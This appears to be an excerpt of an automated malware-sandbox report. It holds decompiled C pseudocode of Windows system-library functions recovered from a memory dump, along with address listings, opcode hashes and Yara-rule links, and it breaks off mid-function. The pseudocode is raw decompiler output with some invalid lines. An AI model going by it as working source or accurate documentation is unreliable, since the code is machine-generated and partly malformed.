0x053f51a9
0x053f51a9
0x053f51b5
0x053f51b8
0x053f51bb
0x053f51be
0x053f51c1
0x053f51c5
0x053f51c9
0x053f51cd
0x053f51cd
0x053f51d8
0x053f51dc
0x053f51e0
0x05436dcc
0x05436dd0
0x05436dd5
0x05436ddd
0x05436de1
0x05436de1
0x05436de5
0x05436deb
0x05436df1
0x05436df7
0x05436dfd
0x05436e01
0x05436e05
0x05436e09
0x05436e0d
0x05436e11
0x05436e11
0x053f51eb
0x05436e1a
0x05436e1f
0x05436e21
0x05436e23
0x00000000
0x053f51f1
0x053f51f1
0x00000000
0x053f51f1

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cd41ec4a6df21d405ebe08295a4887e35a8c2e7a7271b857c4aca4237b5d39b
Instruction ID: 0c1ee7725f83dd4380be3190bc311998f7f14f98ea367aababba73ba78a3ceec
Opcode Fuzzy Hash: 2cd41ec4a6df21d405ebe08295a4887e35a8c2e7a7271b857c4aca4237b5d39b
Instruction Fuzzy Hash: C7C123756083819FD354CF28C581A9AFBF1BF88304F144A6EF9998B362D771E945CB42

Uniqueness

Uniqueness Score: -1.00%

Function 053F03E2, Relevance: .3, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E053F03E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x54bd360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E053F0548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E0540B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E053DB02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x54b7c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E053E7D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E053E7D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E05447016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E05409830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E054469A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x54b7c04 != 0) {
						_t118 = _v12;
						_t120 = E0544A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x54b7bd8;
						if( *0x54b7bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E054095D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E054099A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E05443540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E053CB1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E0540AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x54b8474 - 3;
										if( *0x54b8474 != 3) {
											 *0x54b79dc =  *0x54b79dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E053E7D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E053E7D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E05447016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x54b8708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x54b7b00; // 0x0
							asm("ror esi, cl");
							 *0x54bb1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E054095D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E053D7F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}

0x053f03f1
0x053f03f7
0x053f03f9
0x053f03fb
0x053f03fd
0x053f0400
0x053f040a
0x05434c7a
0x053f0537
0x053f0547
0x053f0410
0x053f0410
0x053f0414
0x053f0417
0x053f041a
0x053f0421
0x053f0424
0x053f042b
0x053f043b
0x053f043e
0x053f043f
0x053f043f
0x053f0446
0x053f0449
0x053f044c
0x053f044f
0x053f0459
0x05434c8d
0x053f045f
0x053f045f
0x053f045f
0x053f0467
0x05434c97
0x05434c9d
0x05434ca4
0x05434caa
0x05434caf
0x05434cb1
0x05434cc3
0x05434cb3
0x05434cbc
0x05434cbc
0x05434cc8
0x05434ccb
0x05434cd7
0x05434cda
0x05434cdf
0x05434cdf
0x05434ccb
0x05434ca4
0x053f046d
0x053f046f
0x053f046f
0x053f0471
0x053f0476
0x053f047a
0x053f047b
0x053f0483
0x053f0489
0x053f048d
0x00000000
0x00000000
0x05434ce9
0x05434cef
0x05434d22
0x05434d22
0x00000000
0x05434d22
0x05434cf1
0x05434cf7
0x00000000
0x00000000
0x05434cf9
0x05434cff
0x00000000
0x00000000
0x05434d05
0x05434d07
0x00000000
0x00000000
0x05434d0d
0x05434d0f
0x05434d14
0x05434d16
0x00000000
0x00000000
0x05434d1c
0x05434d1c
0x053f0499
0x053f0535
0x053f0535
0x00000000
0x053f0535
0x053f04a6
0x05434d2c
0x05434d37
0x05434d39
0x05434d3b
0x00000000
0x00000000
0x05434d41
0x05434d48
0x053f0527
0x053f052b
0x053f052d
0x053f0530
0x053f0530
0x00000000
0x053f052b
0x05434d4e
0x053f04ac
0x053f04ac
0x053f04af
0x053f04b2
0x053f04b7
0x053f04b9
0x053f04bb
0x053f04bd
0x053f04bf
0x053f04c5
0x053f04c9
0x05434d53
0x05434d59
0x05434db9
0x05434dba
0x05434dbf
0x05434dc2
0x05434dc4
0x05434dc7
0x05434dce
0x00000000
0x05434dce
0x05434d5b
0x05434d61
0x00000000
0x00000000
0x05434d63
0x05434d69
0x00000000
0x00000000
0x05434d6b
0x05434d6e
0x05434d74
0x05434d76
0x05434d7c
0x05434d7e
0x05434d84
0x05434d89
0x05434d8c
0x05434d8d
0x05434d92
0x05434d95
0x05434d96
0x05434d98
0x05434d9a
0x05434d9f
0x05434da4
0x05434da6
0x05434da8
0x05434daf
0x05434db1
0x05434db1
0x05434daf
0x05434da6
0x05434d84
0x05434d7c
0x00000000
0x05434d74
0x053f04d6
0x05434de1
0x053f04dc
0x053f04dc
0x053f04dc
0x053f04e4
0x05434deb
0x05434df1
0x05434df8
0x05434dfe
0x05434e03
0x05434e05
0x05434e17
0x05434e07
0x05434e10
0x05434e10
0x05434e1c
0x05434e1f
0x05434e35
0x05434e35
0x05434e1f
0x05434df8
0x053f04f1
0x053f04fa
0x05434e3f
0x05434e47
0x05434e5b
0x05434e61
0x05434e67
0x05434e69
0x05434e71
0x05434e73
0x053f0500
0x053f0500
0x053f0500
0x053f04fa
0x053f0508
0x053f051d
0x053f051d
0x053f051f
0x053f0524
0x00000000
0x053f0524
0x053f0515
0x053f0517
0x05434e7a
0x05434e7c
0x00000000
0x00000000
0x05434e85
0x00000000
0x05434e85
0x00000000
0x053f0517

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63ed0366949a7fa5d518d595c2544bb5df9497a99f3e99835d22c21dbe5d46e0
Instruction ID: bcaa01f089dab360deec60968e178441f9e0e21c0495e1a3fe0250b3c2c4cce7
Opcode Fuzzy Hash: 63ed0366949a7fa5d518d595c2544bb5df9497a99f3e99835d22c21dbe5d46e0
Instruction Fuzzy Hash: 0B911731E042549BEF25DB6CC84DBFEBBA5FB05714F0502A6EA12A72E1DB749D00CB91

Uniqueness

Uniqueness Score: -1.00%

Function 053CC600, Relevance: .2, Instructions: 225
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E053CC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x54bd360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E053D6D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E0540B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x54b7b9c; // 0x0
					_t74 = L053E4620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E05409650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L053E77F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E0540F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E054013C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L053E77F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E05409650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}

0x053cc608
0x053cc615
0x053cc625
0x053cc62d
0x053cc635
0x053cc640
0x053cc680
0x053cc687
0x053cc688
0x053cc689
0x053cc694
0x053cc694
0x053cc642
0x053cc64a
0x053cc697
0x05437a25
0x05437a2b
0x05437a2e
0x05437a30
0x05437bea
0x05437bea
0x00000000
0x05437bea
0x05437a36
0x05437a43
0x05437a48
0x05437a4c
0x05437a4e
0x00000000
0x00000000
0x05437a58
0x05437a5a
0x05437a5b
0x05437a5c
0x05437a5d
0x05437a63
0x05437a64
0x05437a6a
0x05437a6c
0x05437a6e
0x054379cb
0x054379cb
0x054379ce
0x054379d0
0x05437a98
0x05437a9b
0x05437a9b
0x05437a9e
0x05437aa1
0x05437bbe
0x05437bbe
0x05437bc0
0x05437be0
0x05437be0
0x05437a01
0x05437a01
0x05437a05
0x05437a07
0x05437a15
0x05437a15
0x05437a1a
0x00000000
0x05437a1a
0x05437bc2
0x05437bc6
0x05437bc9
0x05437bcd
0x05437bcf
0x054379e6
0x054379e6
0x054379eb
0x054379eb
0x054379ef
0x054379f1
0x00000000
0x00000000
0x054379f3
0x054379f5
0x054379ff
0x054379ff
0x00000000
0x054379ff
0x054379f7
0x054379fd
0x00000000
0x00000000
0x00000000
0x054379fd
0x05437bd5
0x05437bd8
0x00000000
0x00000000
0x05437ba9
0x05437bac
0x05437bb0
0x05437bb1
0x05437bb1
0x05437bb6
0x00000000
0x05437bb6
0x05437aa7
0x05437aaa
0x00000000
0x00000000
0x05437ab2
0x05437ab3
0x05437ab5
0x05437aec
0x05437aef
0x05437b25
0x05437b28
0x05437b62
0x05437b64
0x05437b8f
0x05437b92
0x05437b96
0x05437b98
0x00000000
0x00000000
0x05437b9e
0x05437b9f
0x05437ba3
0x00000000
0x05437ba3
0x05437b66
0x05437b68
0x05437ae2
0x05437ae2
0x00000000
0x05437ae2
0x05437b6e
0x05437b72
0x05437b75
0x05437b81
0x05437b85
0x05437b87
0x00000000
0x00000000
0x05437b31
0x05437b34
0x05437b3c
0x05437b45
0x05437b46
0x05437b4f
0x05437b51
0x05437b57
0x05437b59
0x05437b59
0x00000000
0x05437b59
0x05437b77
0x00000000
0x05437b77
0x05437b2a
0x00000000
0x05437b2a
0x05437af1
0x05437af3
0x00000000
0x00000000
0x05437afb
0x05437afc
0x05437afe
0x00000000
0x00000000
0x05437b00
0x05437b03
0x00000000
0x00000000
0x05437b05
0x05437b09
0x05437b0d
0x05437b0f
0x00000000
0x00000000
0x05437b18
0x05437b1d
0x00000000
0x05437b1d
0x05437ab7
0x05437ab9
0x00000000
0x00000000
0x05437abf
0x05437ac1
0x00000000
0x00000000
0x05437ac3
0x05437ac6
0x00000000
0x00000000
0x05437ac8
0x05437acc
0x05437ad0
0x05437ad2
0x00000000
0x00000000
0x05437adb
0x00000000
0x05437adb
0x054379d6
0x054379d9
0x054379dc
0x05437a91
0x05437a94
0x00000000
0x05437a94
0x054379e2
0x00000000
0x054379e2
0x05437a74
0x05437a7a
0x00000000
0x00000000
0x05437a8a
0x05437a21
0x05437a21
0x00000000
0x05437a21
0x053cc650
0x053cc651
0x053cc656
0x053cc65c
0x053cc65d
0x053cc663
0x053cc664
0x053cc66a
0x053cc66e
0x054379c5
0x054379c7
0x00000000
0x054379c7
0x053cc67a
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f721d2fdcfec1b6045845b2edfd5b3b6f054962a4abe6e2c532374f44457c9e
Instruction ID: cfc49292fbc611ff39a564f183ce6f01045f55125db2572e0e0d3c313e86674b
Opcode Fuzzy Hash: 8f721d2fdcfec1b6045845b2edfd5b3b6f054962a4abe6e2c532374f44457c9e
Instruction Fuzzy Hash: CD8181B56082019BDB25DF14C882EBB77A5FF88254F1449ABED859B361D330DE41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 05446DC9, Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E05446DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L053E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E05446B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E053E7D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E05409AE0();
					_t87 = L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E0544795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E0544795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E0544795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E0544795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L053E4620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E05446B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E05446B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E05446B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E05446B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E053E7D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E05409AE0();
								L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L053E2400( &_v36);
							if(_v24 >= 0) {
								_t87 = L053E2400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L053E2400( &_v52);
							}
							if(_v28 >= 0) {
								return L053E2400( &_v60);
							}
						}
					}
				}
				return _t87;
			}

0x05446dd4
0x05446dde
0x05446de1
0x05446de3
0x05446de6
0x05446de9
0x05446dec
0x05446def
0x05446df2
0x05446df5
0x05446dfe
0x05446e04
0x05446e09
0x05446e0d
0x05446e18
0x05446e1b
0x05446e22
0x05446e2d
0x05446e30
0x05446e36
0x05446e42
0x05446e4d
0x05446e50
0x05446e55
0x05446e5c
0x05446e6e
0x05446e5e
0x05446e67
0x05446e67
0x05446e73
0x05446e74
0x05446e77
0x05446e7c
0x05446e7d
0x05446e8e
0x05446e93
0x05446e9c
0x05446ea8
0x05446eab
0x05446eac
0x05446eb3
0x05446ecd
0x05446edc
0x05446ee2
0x05446ee5
0x05446ef2
0x05446efb
0x05446f01
0x05446f06
0x05446f0b
0x05446f11
0x05446f1a
0x05446f22
0x05446f26
0x05446f26
0x05446f33
0x05446f41
0x05446f44
0x05446f47
0x05446f54
0x05446f65
0x05446f77
0x05446f7c
0x05446f82
0x05446f91
0x05446f99
0x05446fa3
0x05446fae
0x05446fae
0x05446fba
0x05446fbb
0x05446fbc
0x05446fc1
0x05446fc2
0x05446fd3
0x05446fd8
0x05446fd8
0x05446fdf
0x05446fe8
0x05446fee
0x05446fee
0x05446ff5
0x05446ffb
0x05446ffb
0x05447004
0x00000000
0x0544700a
0x05447004
0x05446eb3
0x05446e9c
0x05447015

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction ID: d69c589c1b99297bfaeacdd2e04991c5e15495d731fea87d38fa3dfe3e61c2e6
Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction Fuzzy Hash: 5E717E71A00219AFDB11DFA5C944EEEBBF9FF48704F14416AE505E7290D734AA42CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0545B8D0, Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E0545B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x54b7b9c; // 0x0
				_t124 = L053E4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E05409800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
